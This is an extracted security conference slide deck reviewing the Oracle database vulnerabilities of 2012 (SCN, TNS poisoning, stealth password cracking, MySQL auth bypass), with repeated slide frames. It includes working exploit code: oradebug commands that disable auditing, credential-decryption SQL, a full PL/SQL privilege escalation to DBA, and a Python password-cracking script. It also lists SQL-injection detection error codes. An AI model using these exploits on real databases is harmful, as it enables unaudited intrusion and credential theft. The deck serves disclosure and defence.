Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle!...
Transcript of Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle!...
Best of Oracle Security 2012Best of Oracle Security 2012What happened in 2012
Agenda
! Recapitulation 2011! January 2012 - October 2012! Q&A
Recapitulation 2011
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disables normal and SYS Auditing
! Can‘t be audited
! Platform independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disables normal and SYS Auditing
! Can‘t be audited
! Platform independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
UNFIXED
Disable Oracle AuditingSQL> oradebug setmypid
Statement processed.
SQL> oradebug setvar sga kzaflg_ 0
BEFORE: [1492F4EC0, 1492F4EC4) = 00000001
AFTER: [1492F4EC0, 1492F4EC4) = 00000000
2012 - The Good, The Bad, The Ugly
The good
Lowest number of vulnerabilities in Oracle
database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More (8) remote exploitable bugs (2011: 5 )
The good
Lowest number of vulnerabilities in Oracle
database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More (8) remote exploitable bugs (2011: 5 )
• January 2012 CPU (2 Vulnerabilities – 1 remote)
• April 2012 CPU (6 Vulnerabilities – 3 remote)
• July 2012 CPU (4 Vulnerabilities – 3 remote)
• October 2012 CPU (5 Vulnerabilities – 1 remote)
The bad
Critical bugs are not fixed (only workarounds)
! SCN bug was not fixed
! TNS Poisoning was not fixed
! Stealth Password Cracking was not fixed
The ugly
Oracle Corporation
! Really bad communication skills (TNS poisoning)
! Unwilling to fix problems (TNS poisoning, stealth
password cracking)
! Customer is guilty for not fixing issues: „Customers
have requested that Oracle not include such security
fixes into Critical Patch Updates ...“
2012
January 2012
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
January 2012
• Oracle CPU January 2012 *
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
January 2012
• Oracle CPU January 2012 *
• Problem with large Sequence Change Numbers
(SCN) **
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
January 2012 CPU*
• 2 security fixes (1 remote exploitable)
• Core RDBMS
• TNS Listener
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value
! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value
! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
UNFIXED
SCN: 10 Mio
DB1
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
Compare 10 Mio vs. 2 Mio
Take the highest number
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
Compare 10 Mio vs. 2 Mio
Take the highest number
Undocumented Oracle Parameter
or
Backup bug is dramatically increasing the SCN
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
Database Link
SCN: Huge SCN
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
DB2
SCN: Huge SCN
DB Crash after a while
Database Link
SCN: Huge SCN
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL
cleartext password *
• DBMS_SCHEDULER opens a port 4444 if
undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL
cleartext password *
• DBMS_SCHEDULER opens a port 4444 if
undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
Featu
re
exec DBMS_SCHEDULER.CREATE_CREDENTIAL( credential_name => 'local_credential', username => 'oracle', password => 'welcome1');
select o.object_name credential_name, username, password FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o WHERE c.obj# = o.object_id;
CREDENTIAL_NAME USERNAME PASSWORD------------------ -------- ------------------------------------LOCAL_CREDENTIAL oracle BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==LOCAL_CREDENTIAL2 oracle2 BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==
SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME, DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwdFROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ UWHERE U.USER# = O.OWNER# AND C.OBJ# = O.OBJ# ;
CREDENTIAL_OWNER CREDENTIAL_NAME USERNAME PWD---------------- -------------------- -------- --------SYS LOCAL_CREDENTIAL oracle welcome1SYS LOCAL_CREDENTIAL2 oracle2 welcome1
Decrypt Oracle Scheduler Credentials
...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcherbitand( ,131072)starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444 I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?...
Due to undocumented functionality DBMS_SCHEDULER
listens a port 4444 if a special parameter is used.
Scheduler Credentials
March 2012
• Disabling Oracle trigger on a per-session basis *
• Self-Defending Databases **
* http://www.pythian.com/news/30781/disabling-triggers-per-session/ ** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.
Disable Oracle Triggers for a session
Disable all triggers for a session. This could be used to
bypass shadow/history table architectures.
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.
Disable Oracle Triggers for a session
Disable all triggers for a session. This could be used to
bypass shadow/history table architectures.
Featu
re
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
• But the database itself is able to detect these kind of attacks
by looking at specific error messages created by the SQL
injection attack
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
• But the database itself is able to detect these kind of attacks
by looking at specific error messages created by the SQL
injection attack
• After detection the appropriate countermeasures could be
taken.
22
22
23
23
23
Detection of SQL Injection Attacks (from the web)
• Depending from the used attack method (UNION, extend query, create
error messages to retrieve data, …) a specific error will be created
e.g.
ORA-01789: query block has incorrect number of result columns
• Or
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft]
[ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value ’mypassword' to a column of data type int. /
Administrator/login.asp, line 27
Detection of SQL Injection Attacks (from the web)
Out-of-the-box Databases like Oracle or Microsoft SQL Server are able to
detect SQL specific error messages and can run (custom) code
(=countermeasure) after the detection.
These specific database errors only occur if a vulnerability exists and this
vulnerability was triggered by a specific string (e.g. “or 1=1--”)
False positives are rare. A false positive could occur if a developers are
deploying applications with incorrect SQL statement (e.g. missing single
quote).
SQL Injection Error Codes Oracle - IError code Error Message Typical Command
ORA-00900
ORA-00906
ORA-00907
ORA-00911
ORA-00917
ORA-00920
ORA-00923
ORA-00933
ORA-00970
ORA-01031
ORA-01476
ORA-01719
ORA-01722
invalid SQL statement
missing left parenthesis
missing right parenthesis
invalid character e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote
missing comma
invalid relational operator
FROM keyword not found where expected
SQL command not properly terminated
missing WITH keyword
insufficient privileges Attempted privilege escalation
divisor is equal to zero Blind SQL Injection attempt (e.g. sqlmap)
outer join operator not allowed in operand of OR or IN
invalid number Enumeration with rownum and current rownum does not exist
SQL Injection Error Codes Oracle - IIError code Error Message Typical CommandORA-01742
ORA-01756
ORA-01789
ORA-01790
ORA-24247
ORA-29257
ORA-29540
ORA-31011ORA-19202
comment not properly terminated inline comment, e.g optimizer hint is not properly terminatedquoted not properly terminated single quote not properly terminated
query block has incorrect number of result columns
Attempt to use UNION SELECT
expression must have same datatype as corresponding
Attempt to use UNION SELECT
network access denied by access control list
Oracle ACL has blocked the usage of UTL_INADDR (or similar)
Host %S unknown Attempted SQL Injection via utl_inaddr
Class does not exist Attempted utl_inaddr attempt but Java is not installed
XML parsing failed SQL Injection attempt via xmltypeError occurred in XML processing SQL Injection via extractvalue
CREATE OR REPLACE TRIGGER after_error AFTER SERVERERROR ON DATABASE DECLARE sql_text ORA_NAME_LIST_T; v_stmt CLOB; -- SQL statement causing the problem n NUMBER; -- number of junks for constructing the sql statement causing the error v_program VARCHAR2(64); v_serial number; v_sid number;BEGIN-- Version 1.00select program,serial#,sid into v_program,v_serial,v_sid from v$session where sid=sys_context('USERENV', 'SID'); -- construct the sql text n := ora_sql_txt(sql_text); -- IF n >= 1 THEN FOR i IN 1..n LOOP v_stmt := v_stmt || sql_text(i); END LOOP; END IF; --
FOR n IN 1..ora_server_error_depth LOOP
IF (lower(v_program) = 'iis.exe') -- add your own application server and (ora_server_error(n) in ('942','900','906','907','911','917','920','923','933','970','1031','1476','1719','1722','1742','1756','1789','1790','19202','24247','29257','29540','31011')) THEN -- Potential attack was detected -- 1. Monitor the attack -- 2. Send an email to the responsible person (DBA/MoD) -- send_email (e.g. via utl_smtp ) -- 3. Lock database user used by the webapp execute immediate ('ALTER USER /* Error_Trigger */ "'|sys_context('USERENV','SESSION_USER')||'" account lock'); -- 4. Terminate Session execute immediate ('ALTER SYSTEM /* Error_Trigger */ KILL SESSION '''||v_sid||','||v_serial||''' account lock'); alter system kill session 'session-id,session-serial' -- 5. Other countermeasures
END IF; END LOOP; --END after_error;/
April 2012
• Oracle CPU April 2012 *
• TNS Poisoning **
• Critical MySQL Bug published ***
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html ** http://seclists.org/fulldisclosure/2012/Apr/343*** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
April 2012 CPU*
• 6 security fixes (3 remote exploitable)
• Core RDBMS
• OCI
• Enterprise Manager
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
TNS Poisoning
• Reported by Joxean Koret in 2008 to Oracle*
• Everyone with access to the listener can redirect any
network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem („was fixed in a
future version“) the founder of this bug released an
advisory including proof-of-concept code (for SIDs
mit 6 characters).
• To implement a workaround Oracle even changed
the license agreement for RAC (inclusion of
Advanced Security Option ASO) to be able to
protect RAC.
* http://seclists.org/fulldisclosure/2012/Apr/204
TNS Poisoning
• Reported by Joxean Koret in 2008 to Oracle*
• Everyone with access to the listener can redirect any
network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem („was fixed in a
future version“) the founder of this bug released an
advisory including proof-of-concept code (for SIDs
mit 6 characters).
• To implement a workaround Oracle even changed
the license agreement for RAC (inclusion of
Advanced Security Option ASO) to be able to
protect RAC.
UNFIXED
* http://seclists.org/fulldisclosure/2012/Apr/204
Listener
Attacker Listener
Attacker Listener
Register Additional Listener
Attacker Listener
Attacker Listener
Victim
Logon
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
Attacker is now manin the middle (MITM)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
Attacker ListenerRedirect Network Traffic of the victim
Forward to the database again
TNS Poisoning - Statements Oracle*
• Oracle: „The fix is very complex and it is extremely
risky to backport.“
• Oracle: „This fix is in a sensitive part of our code where
regressions are a concern.„
• Oracle: „Customers have requested that Oracle not
include such security fixes into Critical Patch Updates
that increases the chance of regressions.“
• Oracle: „To protect the interest of our customers, we
do not provide these level of details (like versions
affected) for the issues that are addressed as in-
depth. The future releases will have the fix.“
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Statement Researcher *
• Joxean: „So, as previously stated, this is a 0day
vulnerability with no patch, Oracle refuses to patch
the vulnerability in *any* existing version and Oracle
refuses to give details about which versions will have
the fix. But they say the vulnerability is fixed. Cool.“
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Workarounds
• There are different workarounds available (COSTS
parameter, dynamic registration, restricted_nodes)
• There 2 documents for non-RAC and RAC systems
available in Oracle MyOracleSupport (1453883.1 ,
1340831.1) describing the workarounds
• Testing is necessary to avoid side-effects (e.g. Grid-
Control, ip restriction sqlnet.ora & IPC)
• set dynamic_registration=off
MySQL - Password Problem*,**
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
May 2012
• nothing special happened
June 2012
• nothing special happened
July 2012
• Oracle CPU July 2012 *
* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
July 2012 CPU*
• 4 security fixes (3 remote exploitable)
• Core RDBMS
• Enterprise Manager
• Network Layer
• Hidden Security bug in Oracle Text (Blackhat
0day) was fixed without being mentioned.
• Fixing security bugs without documenting it, is a
common Oracle practice.
August 2012
• 0day privilege escalation exploit
(CVE-2012-3132) for Oracle 11g released at
BlackHat 2012 Las Vegas *
• Out-of-Band Patch for Oracle **
(„Oracle Database Server versions 11.2.0.2 and
11.2.0.3 do not require patching if the July 2012
Critical Patch Update has been applied.“)
* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html
connect blackhat/password
set role dba; -- throws an error
create or replace function X return varchar authid current_user ispragma autonomous_transaction;beginexecute immediate 'GRANT DBA TO BLACKHAT';commit;return 'FOO';END;/
grant execute on X to public;
create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);
create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;
exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);
drop table pwnoracle;
set role dba;
September 2012• Stealth Password Cracking Exploit released
• Cleartext passwords at OCI Client Side
• Metasploit/Meterpreter Modules for
• TNS Poisoning
• Get Cleartext passwords clientside
• Get Cleartext passwords serverside
• Run OS Commands (via oradebug)
• Side Channel attack on ORA-00942
Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *
! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete Logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *
! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete Logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
UNFIXED
Stealth Password Cracking I
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker1.) Logon: SYSTEM
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker
2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)
Stealth Password Cracking I
Attacker
2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)
3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
Stealth Password Cracking I
Attacker
3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker
4.) Send Salt + encrypted Session Key
Stealth Password Cracking I
Attacker
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08
9.) If true then password foundelse try a new password
Stealth Password Cracking II
! Attacker sends an username (e.g. SYSTEM) without a password to the database
! The database reads the password hash of the user SYSTEM
! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08
! The result is encrypted (AES) with the password salt of the user
! The encrypted session key + the salt is sent to the attacker
! Attacker stops the login process
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
Stealth Password Cracking III
! Attacker now generate SHA1 hashes for common passwords using the salt received from the database
! This hash is used to decrypt the received session key
! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known
Pseudo-Code! users.txt (list of common users)
dict.txt (common passwords)
! for all entries in users.txt do result:=send_logon_paket(USERNAME) if result contains a salt -- we found a valid user do for all passwords in dict.txt do hash:=sha1(password||salt) decres:=decrypt_aes(session_key,hash) if decres contains \x08\x08\x08\x08 then print „password found“ od od od
! Thousands of (local) tests could be done in a second.Only 1 network packet per username
import hashlib from Crypto.Cipher import AES
def decrypt(session,salt,password): pass_hash = hashlib.sha1(password+salt)
key = pass_hash.digest() + '\x00\x00\x00\x00' decryptor = AES.new(key,AES.MODE_CBC) plain = decryptor.decrypt(session) return plain
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
salt_hex = 'A7193E546377EC56639E'
passwords = ['test','password','oracle','demo']
for password in passwords: session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password) print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex')) if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08': print 'PASSWORD IS "%s"' % password break
Stealth Password Cracking II
! Tools already exist (John the Ripper)
! Up to 1 Million passwords/second tests
Mitigation of the problem
! (No Patch) Switch back to the old DES password hashes by using the parameter
SEC_CASE_SENSITIVE_LOGON=FALSE
! Oracle October 2012 CPU removes the vulnerable protocol and automatically switch back to Ologon V10
! Set
sqlnet.allowed_logon_version=12
to Ologon Protocol V12. This requires 11.2.0.3 client
DerbyCon / Hacktivity Presentation of László Tóth and Ferenc Spala
! Presentation about database security without SQL Injection
! New flaw in the OCI driver
! Presentation of tools for Metasploit to run os commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
UNFIXED
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server
Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.
Metapreter is an advanced payload for Metasploit
! Metasploit Module: oradebugRun OS commands via oradebug call system
! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module
! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server
! Meterpreter extension: ocioraloglogs the cleartext password from the OCI driver
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server the session could be overtaken
! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions
! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)
! File with passwords can be transferred to the computer of the attacker.
Run OS Commands from the web
http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
Side Channel attack on ORA-00942 *
! Martin Berger showed that a side channel attack is possible against Oracle and ORA-00942 *
! The number of recursive calls and count execute allows to find out if object exists.
* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html
Run OS Commands from the web3
select"ms.sid,"ms.statistic#,"sn.name,"ms.value"from"v$mystat"ms,"V$STATNAME"sn"where"sn.name"in"('recursive"calls',"'execute"count')"and"ms.statistic#"="sn.statistic#"order"by"2;
SQL> select * from a.uztrfghj;select * from a.uztrfghj *ERROR at line 1:ORA-00942: table or view does not exist21 recursive calls 3 execute count
No user ZZZ exists, but a user A exists. (but no table A.UZTRFGHJ) There is one more recursive call if the user exists.
SQL> select * from a.m ;select * from a.m *ERROR at line 1:ORA-00942: table or view does not exist26 recursive calls 7 execute count
Now there are even more recursive calls and execute count. The Table A.M exists.
October 2012
• Oracle CPU October 2012 *
• Application Security of Core Banking Systems **
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm
October 2012 CPU*
• 5 security fixes (1 remote exploitable)
• Core RDBMS
